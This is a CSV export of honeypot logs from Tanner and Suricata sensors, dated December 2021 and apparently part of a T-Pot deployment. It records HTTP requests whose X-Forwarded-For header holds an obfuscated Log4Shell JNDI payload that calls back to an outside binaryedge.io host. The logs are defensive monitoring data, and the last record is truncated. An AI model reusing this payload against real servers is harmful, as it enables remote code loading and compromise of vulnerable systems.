"2021-12-15T08:33:17.202Z",1,p4I5vX0B6VkG8jKziUT2,"logstash-tanner-2021.12.15",,"_doc","73efae14-eb5a-4366-9388-aec82a6a21bd",7ae4d5d6f86f,"360f177b-f91b-457e-a910-f20d2dd1d5aa",7ae4d5d6f86f,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,,,80,,,"1.6.0",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"Digital Ocean, Inc.",14061,Toronto,NA,CA,CA,Canada,,"138.197.167.229","43.6547","{""lon"":-79.3623,""lat"":43.6547}","-79.3623",M5A,ON,Ontario,"America/Toronto",,,,"*/*","gzip, deflate",,,"keep-alive",,,"172.16.0.42",,"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36","${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}",7ae4d5d6f86f,,,,,,,,,,,,,,,,,,,,,,,,log,,,,,,,,"/data/tanner/log/tanner_report.json",33991,,"{""method"": ""GET"", ""path"": ""/"", ""headers"": {""host"": ""172.16.0.42"", ""user-agent"": ""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"", ""accept-encoding"": ""gzip, deflate"", ""accept"": ""*/*"", ""connection"": ""keep-alive"", ""x-forwarded-for"": ""${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}""}, ""uuid"": ""55f13f21-392e-4a47-b189-33643d9a922e"", ""peer"": {""ip"": ""138.197.167.229"", ""port"": 50702}, ""status"": 200, ""cookies"": {""sess_uuid"": null}, ""response_msg"": {""version"": ""0.6.0"", ""response"": {""message"": {""detection"": {""name"": ""index"", ""order"": 1, ""type"": 1, ""version"": ""0.6.0""}, ""sess_uuid"": ""1d4c0c19-d9a4-41fc-9fe1-58104a59fd3d""}}}, ""timestamp"": ""2021-12-15T08:33:17.202781""}",,,,,,GET,,,,,,"/",,,,,,,,,,,index,1,1,"0.6.0","1d4c0c19-d9a4-41fc-9fe1-58104a59fd3d","0.6.0",,,,,,,,,,,,,,,,,,"138.197.167.229",50702,,,,,,,,,200,,,loudwheel,"172.16.0.42","172.16.0.42","[""tanner"",""beats_input_codec_plain_applied""]",,,,"2021-12-15T08:33:17.202781",,,,,,,,,Tanner,,,"55f13f21-392e-4a47-b189-33643d9a922e",
"2021-12-15T07:53:31.301Z",1,Mh0VvX0B5e7x5EYnB6vA,"logstash-suricata-2021.12.15",,"_doc","9503a305-c1d2-4afe-a8a7-800950b659d7",9ebcef58d248,"944b4fca-89fb-40d7-98ca-3f10eda117e7",9ebcef58d248,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",80,,,"1.6.0",,http,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,1487556000275549,"College of St. Scholastica",30376,Duluth,NA,US,US,"United States",676,"143.110.208.87","46.8147","{""lon"":-92.1998,""lat"":46.8147}","-92.1998",55811,MN,Minnesota,"America/Chicago",,,,,,,,,,,,,,,9ebcef58d248,"gzip, deflate",,,,"172.16.0.42","image/x-icon",GET,,,,,,,"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36",7886,"HTTP/1.1",200,"/favicon.ico?1528612569",,"${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}",,,eth0,log,,,,,,,,"/data/suricata/log/eve.json",16881465,,"{""timestamp"":""2021-12-15T07:53:31.301586+0000"",""flow_id"":1487556000275549,""in_iface"":""eth0"",""event_type"":""http"",""src_ip"":""143.110.208.87"",""src_port"":33700,""dest_ip"":""172.16.0.42"",""dest_port"":80,""proto"":""TCP"",""tx_id"":2,""http"":{""hostname"":""172.16.0.42"",""url"":""/favicon.ico?1528612569"",""http_user_agent"":""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"",""xff"":""${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}"",""http_content_type"":""image/x-icon"",""accept_encoding"":""gzip, deflate"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":200,""length"":7886}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"143.110.208.87",33700,,,,,,,,,,,,nuttyhomework,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied""]",,,,"2021-12-15T07:53:31.301586+0000",,,,,,,,2,Suricata,,,,
"2021-12-15T07:53:31.301Z",1,Mx0VvX0B5e7x5EYnB6vA,"logstash-suricata-2021.12.15",,"_doc","9503a305-c1d2-4afe-a8a7-800950b659d7",9ebcef58d248,"944b4fca-89fb-40d7-98ca-3f10eda117e7",9ebcef58d248,filebeat,"7.11.1",,,,,,,,,,,,,,,,http,,,,,,"143.110.208.87",33700,,,"1.6.0",,fileinfo,,,,,,,,,,,,,,,,,,,,,,,"/favicon.ico",false,"MS Windows icon resource - 3 icons, 16x16, 32 bits/pixel, 24x24, 32 bits/pixel",d316e1622c58825727e7e4e6c954d289,"[]",7886,CLOSED,false,2,,,,,,,1487556000275549,"Digital Ocean, Inc.",14061,Toronto,NA,CA,CA,Canada,,"172.16.0.42","43.6547","{""lon"":-79.3623,""lat"":43.6547}","-79.3623",M5A,ON,Ontario,"America/Toronto",,,,,,,,,,,,,,,9ebcef58d248,,,,,"172.16.0.42","image/x-icon",GET,,,,,,,"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36",7886,"HTTP/1.1",200,"/favicon.ico?1528612569",,"${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}",,,eth0,log,,,,,,,,"/data/suricata/log/eve.json",16882133,,"{""timestamp"":""2021-12-15T07:53:31.301586+0000"",""flow_id"":1487556000275549,""in_iface"":""eth0"",""event_type"":""fileinfo"",""src_ip"":""172.16.0.42"",""src_port"":80,""dest_ip"":""143.110.208.87"",""dest_port"":33700,""proto"":""TCP"",""http"":{""hostname"":""172.16.0.42"",""url"":""/favicon.ico?1528612569"",""http_user_agent"":""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"",""xff"":""${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}"",""http_content_type"":""image/x-icon"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":200,""length"":7886},""app_proto"":""http"",""fileinfo"":{""filename"":""/favicon.ico"",""sid"":[],""magic"":""MS Windows icon resource - 3 icons, 16x16, 32 bits/pixel, 24x24, 32 bits/pixel"",""gaps"":false,""state"":""CLOSED"",""md5"":""d316e1622c58825727e7e4e6c954d289"",""stored"":false,""size"":7886,""tx_id"":2}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",80,,,,,,,,,,,,nuttyhomework,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied""]",,,,"2021-12-15T07:53:31.301586+0000",,,,,,,,,Suricata,,,,
"2021-12-15T07:53:31.295Z",1,zh0VvX0B5e7x5EYnFKuL,"logstash-tanner-2021.12.15",,"_doc","9503a305-c1d2-4afe-a8a7-800950b659d7",9ebcef58d248,"944b4fca-89fb-40d7-98ca-3f10eda117e7",9ebcef58d248,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,"640a3649-64c2-4026-b0a4-134188a3ee89",,80,,,"1.6.0",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"College of St. Scholastica",30376,Duluth,NA,US,US,"United States",676,"143.110.208.87","46.8147","{""lon"":-92.1998,""lat"":46.8147}","-92.1998",55811,MN,Minnesota,"America/Chicago",,,,"*/*","gzip, deflate",,,"keep-alive","sess_uuid=640a3649-64c2-4026-b0a4-134188a3ee89",,"172.16.0.42",,"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36","${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}",9ebcef58d248,,,,,,,,,,,,,,,,,,,,,,,,log,,,,,,,,"/data/tanner/log/tanner_report.json",19642,,"{""method"": ""GET"", ""path"": ""/favicon.ico?1528612569"", ""headers"": {""host"": ""172.16.0.42"", ""user-agent"": ""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"", ""accept-encoding"": ""gzip, deflate"", ""accept"": ""*/*"", ""connection"": ""keep-alive"", ""x-forwarded-for"": ""${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}"", ""cookie"": ""sess_uuid=640a3649-64c2-4026-b0a4-134188a3ee89""}, ""uuid"": ""247a11e8-3b49-464f-838f-386b174b28fc"", ""peer"": {""ip"": ""143.110.208.87"", ""port"": 33700}, ""status"": 200, ""cookies"": {""sess_uuid"": ""640a3649-64c2-4026-b0a4-134188a3ee89""}, ""response_msg"": {""version"": ""0.6.0"", ""response"": {""message"": {""detection"": {""name"": ""index"", ""order"": 1, ""type"": 1, ""version"": ""0.6.0""}, ""sess_uuid"": ""1cbb6e33-432d-4f79-b5e6-b4c243cbe1ac""}}}, ""timestamp"": ""2021-12-15T07:53:31.295488""}",,,,,,GET,,,,,,"/favicon.ico?1528612569",,,,,,,,,,,index,1,1,"0.6.0","1cbb6e33-432d-4f79-b5e6-b4c243cbe1ac","0.6.0",,,,,,,,,,,,,,,,,,"143.110.208.87",33700,,,,,,,,,200,,,nuttyhomework,"172.16.0.42","172.16.0.42","[""tanner"",""beats_input_codec_plain_applied""]",,,,"2021-12-15T07:53:31.295488",,,,,,,,,Tanner,,,"247a11e8-3b49-464f-838f-386b174b28fc",
"2021-12-15T07:53:31.131Z",1,MB0VvX0B5e7x5EYnB6vA,"logstash-suricata-2021.12.15",,"_doc","9503a305-c1d2-4afe-a8a7-800950b659d7",9ebcef58d248,"944b4fca-89fb-40d7-98ca-3f10eda117e7",9ebcef58d248,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",80,,,"1.6.0",,http,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,1487556000275549,"College of St. Scholastica",30376,Duluth,NA,US,US,"United States",676,"143.110.208.87","46.8147","{""lon"":-92.1998,""lat"":46.8147}","-92.1998",55811,MN,Minnesota,"America/Chicago",,,,,,,,,,,,,,,9ebcef58d248,"gzip, deflate",,,,"172.16.0.42","text/html",GET,,,,,,,"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36",446,"HTTP/1.1",404,"/favicon.ico",,"${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}",,,eth0,log,,,,,,,,"/data/suricata/log/eve.json",16879989,,"{""timestamp"":""2021-12-15T07:53:31.131691+0000"",""flow_id"":1487556000275549,""in_iface"":""eth0"",""event_type"":""http"",""src_ip"":""143.110.208.87"",""src_port"":33700,""dest_ip"":""172.16.0.42"",""dest_port"":80,""proto"":""TCP"",""tx_id"":1,""http"":{""hostname"":""172.16.0.42"",""url"":""/favicon.ico"",""http_user_agent"":""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"",""xff"":""${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}"",""http_content_type"":""text/html"",""accept_encoding"":""gzip, deflate"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":404,""length"":446}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"143.110.208.87",33700,,,,,,,,,,,,nuttyhomework,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied""]",,,,"2021-12-15T07:53:31.131691+0000",,,,,,,,1,Suricata,,,,
"2021-12-15T07:53:31.131Z",1,MR0VvX0B5e7x5EYnB6vA,"logstash-suricata-2021.12.15",,"_doc","9503a305-c1d2-4afe-a8a7-800950b659d7",9ebcef58d248,"944b4fca-89fb-40d7-98ca-3f10eda117e7",9ebcef58d248,filebeat,"7.11.1",,,,,,,,,,,,,,,,http,,,,,,"143.110.208.87",33700,,,"1.6.0",,fileinfo,,,,,,,,,,,,,,,,,,,,,,,"/favicon.ico",false,"HTML document, ASCII text",27a505e858e000b7a478dfde26bf8378,"[]",446,CLOSED,false,1,,,,,,,1487556000275549,"Digital Ocean, Inc.",14061,Toronto,NA,CA,CA,Canada,,"172.16.0.42","43.6547","{""lon"":-79.3623,""lat"":43.6547}","-79.3623",M5A,ON,Ontario,"America/Toronto",,,,,,,,,,,,,,,9ebcef58d248,,,,,"172.16.0.42","text/html",GET,,,,,,,"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36",446,"HTTP/1.1",404,"/favicon.ico",,"${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}",,,eth0,log,,,,,,,,"/data/suricata/log/eve.json",16880642,,"{""timestamp"":""2021-12-15T07:53:31.131691+0000"",""flow_id"":1487556000275549,""in_iface"":""eth0"",""event_type"":""fileinfo"",""src_ip"":""172.16.0.42"",""src_port"":80,""dest_ip"":""143.110.208.87"",""dest_port"":33700,""proto"":""TCP"",""http"":{""hostname"":""172.16.0.42"",""url"":""/favicon.ico"",""http_user_agent"":""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"",""xff"":""${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}"",""http_content_type"":""text/html"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":404,""length"":446},""app_proto"":""http"",""fileinfo"":{""filename"":""/favicon.ico"",""sid"":[],""magic"":""HTML document, ASCII text"",""gaps"":false,""state"":""CLOSED"",""md5"":""27a505e858e000b7a478dfde26bf8378"",""stored"":false,""size"":446,""tx_id"":1}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",80,,,,,,,,,,,,nuttyhomework,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied""]",,,,"2021-12-15T07:53:31.131691+0000",,,,,,,,,Suricata,,,,
"2021-12-15T07:53:31.124Z",1,zR0VvX0B5e7x5EYnFKuL,"logstash-tanner-2021.12.15",,"_doc","9503a305-c1d2-4afe-a8a7-800950b659d7",9ebcef58d248,"944b4fca-89fb-40d7-98ca-3f10eda117e7",9ebcef58d248,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,"640a3649-64c2-4026-b0a4-134188a3ee89",,80,,,"1.6.0",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"College of St. Scholastica",30376,Duluth,NA,US,US,"United States",676,"143.110.208.87","46.8147","{""lon"":-92.1998,""lat"":46.8147}","-92.1998",55811,MN,Minnesota,"America/Chicago",,,,"*/*","gzip, deflate",,,"keep-alive","sess_uuid=640a3649-64c2-4026-b0a4-134188a3ee89",,"172.16.0.42",,"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36","${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}",9ebcef58d248,,,,,,,,,,,,,,,,,,,,,,,,log,,,,,,,,"/data/tanner/log/tanner_report.json",18757,,"{""method"": ""GET"", ""path"": ""/favicon.ico"", ""headers"": {""host"": ""172.16.0.42"", ""user-agent"": ""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"", ""accept-encoding"": ""gzip, deflate"", ""accept"": ""*/*"", ""connection"": ""keep-alive"", ""x-forwarded-for"": ""${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}"", ""cookie"": ""sess_uuid=640a3649-64c2-4026-b0a4-134188a3ee89""}, ""uuid"": ""247a11e8-3b49-464f-838f-386b174b28fc"", ""peer"": {""ip"": ""143.110.208.87"", ""port"": 33700}, ""status"": 200, ""cookies"": {""sess_uuid"": ""640a3649-64c2-4026-b0a4-134188a3ee89""}, ""response_msg"": {""version"": ""0.6.0"", ""response"": {""message"": {""detection"": {""name"": ""index"", ""order"": 1, ""type"": 1, ""version"": ""0.6.0""}, ""sess_uuid"": ""1cbb6e33-432d-4f79-b5e6-b4c243cbe1ac""}}}, ""timestamp"": ""2021-12-15T07:53:31.124665""}",,,,,,GET,,,,,,"/favicon.ico",,,,,,,,,,,index,1,1,"0.6.0","1cbb6e33-432d-4f79-b5e6-b4c243cbe1ac","0.6.0",,,,,,,,,,,,,,,,,,"143.110.208.87",33700,,,,,,,,,200,,,nuttyhomework,"172.16.0.42","172.16.0.42","[""tanner"",""beats_input_codec_plain_applied""]",,,,"2021-12-15T07:53:31.124665",,,,,,,,,Tanner,,,"247a11e8-3b49-464f-838f-386b174b28fc",
"2021-12-15T07:53:30.820Z",1,Lh0VvX0B5e7x5EYnB6vA,"logstash-suricata-2021.12.15",,"_doc","9503a305-c1d2-4afe-a8a7-800950b659d7",9ebcef58d248,"944b4fca-89fb-40d7-98ca-3f10eda117e7",9ebcef58d248,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",80,,,"1.6.0",,http,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,1487556000275549,"College of St. Scholastica",30376,Duluth,NA,US,US,"United States",676,"143.110.208.87","46.8147","{""lon"":-92.1998,""lat"":46.8147}","-92.1998",55811,MN,Minnesota,"America/Chicago",,,,,,,,,,,,,,,9ebcef58d248,"gzip, deflate",,,,"172.16.0.42","text/html",GET,,,,,,,"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36",4019,"HTTP/1.1",200,"/",,"${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}",,,eth0,log,,,,,,,,"/data/suricata/log/eve.json",16878543,,"{""timestamp"":""2021-12-15T07:53:30.820867+0000"",""flow_id"":1487556000275549,""in_iface"":""eth0"",""event_type"":""http"",""src_ip"":""143.110.208.87"",""src_port"":33700,""dest_ip"":""172.16.0.42"",""dest_port"":80,""proto"":""TCP"",""tx_id"":0,""http"":{""hostname"":""172.16.0.42"",""url"":""/"",""http_user_agent"":""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"",""xff"":""${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}"",""http_content_type"":""text/html"",""accept_encoding"":""gzip, deflate"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":200,""length"":4019}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"143.110.208.87",33700,,,,,,,,,,,,nuttyhomework,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied""]",,,,"2021-12-15T07:53:30.820867+0000",,,,,,,,0,Suricata,,,,
"2021-12-15T07:53:30.820Z",1,Lx0VvX0B5e7x5EYnB6vA,"logstash-suricata-2021.12.15",,"_doc","9503a305-c1d2-4afe-a8a7-800950b659d7",9ebcef58d248,"944b4fca-89fb-40d7-98ca-3f10eda117e7",9ebcef58d248,filebeat,"7.11.1",,,,,,,,,,,,,,,,http,,,,,,"143.110.208.87",33700,,,"1.6.0",,fileinfo,,,,,,,,,,,,,,,,,,,,,,,"/",false,"HTML document, ASCII text",a11b96dc89694dc220111a6d8a9ab389,"[]",4019,CLOSED,false,0,,,,,,,1487556000275549,"Digital Ocean, Inc.",14061,Toronto,NA,CA,CA,Canada,,"172.16.0.42","43.6547","{""lon"":-79.3623,""lat"":43.6547}","-79.3623",M5A,ON,Ontario,"America/Toronto",,,,,,,,,,,,,,,9ebcef58d248,,,,,"172.16.0.42","text/html",GET,,,,,,,"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36",4019,"HTTP/1.1",200,"/",,"${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}",,,eth0,log,,,,,,,,"/data/suricata/log/eve.json",16879186,,"{""timestamp"":""2021-12-15T07:53:30.820867+0000"",""flow_id"":1487556000275549,""in_iface"":""eth0"",""event_type"":""fileinfo"",""src_ip"":""172.16.0.42"",""src_port"":80,""dest_ip"":""143.110.208.87"",""dest_port"":33700,""proto"":""TCP"",""http"":{""hostname"":""172.16.0.42"",""url"":""/"",""http_user_agent"":""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"",""xff"":""${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}"",""http_content_type"":""text/html"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":200,""length"":4019},""app_proto"":""http"",""fileinfo"":{""filename"":""/"",""sid"":[],""magic"":""HTML document, ASCII text"",""gaps"":false,""state"":""CLOSED"",""md5"":""a11b96dc89694dc220111a6d8a9ab389"",""stored"":false,""size"":4019,""tx_id"":0}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",80,,,,,,,,,,,,nuttyhomework,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied""]",,,,"2021-12-15T07:53:30.820867+0000",,,,,,,,,Suricata,,,,
"2021-12-15T07:53:30.806Z",1,zB0VvX0B5e7x5EYnFKuL,"logstash-tanner-2021.12.15",,"_doc","9503a305-c1d2-4afe-a8a7-800950b659d7",9ebcef58d248,"944b4fca-89fb-40d7-98ca-3f10eda117e7",9ebcef58d248,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,,,80,,,"1.6.0",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"College of St. Scholastica",30376,Duluth,NA,US,US,"United States",676,"143.110.208.87","46.8147","{""lon"":-92.1998,""lat"":46.8147}","-92.1998",55811,MN,Minnesota,"America/Chicago",,,,"*/*","gzip, deflate",,,"keep-alive",,,"172.16.0.42",,"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36","${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}",9ebcef58d248,,,,,,,,,,,,,,,,,,,,,,,,log,,,,,,,,"/data/tanner/log/tanner_report.json",17977,,"{""method"": ""GET"", ""path"": ""/"", ""headers"": {""host"": ""172.16.0.42"", ""user-agent"": ""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"", ""accept-encoding"": ""gzip, deflate"", ""accept"": ""*/*"", ""connection"": ""keep-alive"", ""x-forwarded-for"": ""${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}""}, ""uuid"": ""247a11e8-3b49-464f-838f-386b174b28fc"", ""peer"": {""ip"": ""143.110.208.87"", ""port"": 33700}, ""status"": 200, ""cookies"": {""sess_uuid"": null}, ""response_msg"": {""version"": ""0.6.0"", ""response"": {""message"": {""detection"": {""name"": ""index"", ""order"": 1, ""type"": 1, ""version"": ""0.6.0""}, ""sess_uuid"": ""640a3649-64c2-4026-b0a4-134188a3ee89""}}}, ""timestamp"": ""2021-12-15T07:53:30.806521""}",,,,,,GET,,,,,,"/",,,,,,,,,,,index,1,1,"0.6.0","640a3649-64c2-4026-b0a4-134188a3ee89","0.6.0",,,,,,,,,,,,,,,,,,"143.110.208.87",33700,,,,,,,,,200,,,nuttyhomework,"172.16.0.42","172.16.0.42","[""tanner"",""beats_input_codec_plain_applied""]",,,,"2021-12-15T07:53:30.806521",,,,,,,,,Tanner,,,"247a11e8-3b49-464f-838f-386b174b28fc",
"2021-12-15T07:10:38.518Z",1,wrDtvH0BCXMCNTQLylh5,"logstash-suricata-2021.12.15",,"_doc","8c59388c-86e3-4c99-b68f-f2d35c273de2",d5c7664ccd81,"1d24883e-6806-47e2-a24f-db80cd70e61d",d5c7664ccd81,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",80,,,"1.6.0",,http,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,28658520361475,,,,NA,US,US,"United States",,"157.245.42.12","37.751","{""lon"":-97.822,""lat"":37.751}","-97.822",,,,"America/Chicago",,,,,,,,,,,,,,,d5c7664ccd81,"gzip, deflate",,,,"172.16.0.42","image/x-icon",GET,,,,,,,"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36",5430,"HTTP/1.1",200,"/core/misc/favicon.ico",,"${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}",,,eth0,log,,,,,,,,"/data/suricata/log/eve.json",28631875,,"{""timestamp"":""2021-12-15T07:10:38.518796+0000"",""flow_id"":28658520361475,""in_iface"":""eth0"",""event_type"":""http"",""src_ip"":""157.245.42.12"",""src_port"":46258,""dest_ip"":""172.16.0.42"",""dest_port"":80,""proto"":""TCP"",""tx_id"":2,""http"":{""hostname"":""172.16.0.42"",""url"":""/core/misc/favicon.ico"",""http_user_agent"":""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"",""xff"":""${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}"",""http_content_type"":""image/x-icon"",""accept_encoding"":""gzip, deflate"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":200,""length"":5430}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"157.245.42.12",46258,,,,,,,,,,,,obviousweakness,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied"",""_geoip_lookup_failure""]",,,,"2021-12-15T07:10:38.518796+0000",,,,,,,,2,Suricata,,,,
"2021-12-15T07:10:38.518Z",1,w7DtvH0BCXMCNTQLylh5,"logstash-suricata-2021.12.15",,"_doc","8c59388c-86e3-4c99-b68f-f2d35c273de2",d5c7664ccd81,"1d24883e-6806-47e2-a24f-db80cd70e61d",d5c7664ccd81,filebeat,"7.11.1",,,,,,,,,,,,,,,,http,,,,,,"157.245.42.12",46258,,,"1.6.0",,fileinfo,,,,,,,,,,,,,,,,,,,,,,,"/core/misc/favicon.ico",false,"MS Windows icon resource - 2 icons, 16x16, 32 bits/pixel, 32x32, 32 bits/pixel",cf2445dcb53a031c02f9b57e2199bc03,"[]",5430,CLOSED,false,2,,,,,,,28658520361475,"The Procter and Gamble Company",11003,,NA,US,US,"United States",,"172.16.0.42","37.751","{""lon"":-97.822,""lat"":37.751}","-97.822",,,,"America/Chicago",,,,,,,,,,,,,,,d5c7664ccd81,,,,,"172.16.0.42","image/x-icon",GET,,,,,,,"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36",5430,"HTTP/1.1",200,"/core/misc/favicon.ico",,"${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}",,,eth0,log,,,,,,,,"/data/suricata/log/eve.json",28632537,,"{""timestamp"":""2021-12-15T07:10:38.518796+0000"",""flow_id"":28658520361475,""in_iface"":""eth0"",""event_type"":""fileinfo"",""src_ip"":""172.16.0.42"",""src_port"":80,""dest_ip"":""157.245.42.12"",""dest_port"":46258,""proto"":""TCP"",""http"":{""hostname"":""172.16.0.42"",""url"":""/core/misc/favicon.ico"",""http_user_agent"":""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"",""xff"":""${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}"",""http_content_type"":""image/x-icon"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":200,""length"":5430},""app_proto"":""http"",""fileinfo"":{""filename"":""/core/misc/favicon.ico"",""sid"":[],""magic"":""MS Windows icon resource - 2 icons, 16x16, 32 